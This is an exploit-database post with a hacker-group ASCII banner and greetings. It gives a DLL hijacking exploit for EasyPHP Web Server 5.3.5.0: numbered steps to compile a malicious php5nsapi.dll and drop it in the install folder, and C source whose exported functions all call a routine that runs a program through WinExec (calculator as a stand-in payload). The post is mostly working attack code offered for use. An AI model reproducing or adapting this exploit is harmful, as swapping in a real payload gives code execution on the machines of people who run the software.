1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# ======[ DLL Hijack Co0de ====>

/*
###
# Title : EasyPHP Web Server 5.3.5.0 DLL Hijacking Exploit (php5nsapi.dll)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Target : EasyPHP Web Server 5.3.5.0
# Tested on : Windows XP sp3 France
###
1. Compile dll
2. Replace 'php5nsapi.dll' in  EasyPHP directory with your newly compiled dll
3. Startup EasyPHP 5.3 WS
4. Boom Calc!
###
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void sapi_shutdown() { evil(); }
DLLIMPORT void sapi_startup() { evil(); }
DLLIMPORT void sapi_globals_id() { evil(); }
DLLIMPORT void sapi_send_headers() { evil(); }
DLLIMPORT void sapi_get_default_content_type() { evil(); }
DLLIMPORT void nsapi_response_headers() { evil(); }
DLLIMPORT void nsapi_request_headers() { evil(); }
DLLIMPORT void nsapi_virtual() { evil(); }
DLLIMPORT void apache_response_headers() { evil(); }
DLLIMPORT void php_header() { evil(); }
DLLIMPORT void php_module_shutdown_wrapper() { evil(); }
DLLIMPORT void php_end_ob_buffers() { evil(); }
DLLIMPORT void php_handle_aborted_connection() { evil(); }
DLLIMPORT void php_info_print_table_end() { evil(); }
DLLIMPORT void php_info_print_table_row() { evil(); }
DLLIMPORT void php_info_print_table_start() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

/*
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... 
# Exploit-Id Team : jos_ali_joe + kaMtiEz (exploit-id.com) ... All Others * TreX (hotturks.org) 
# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
*/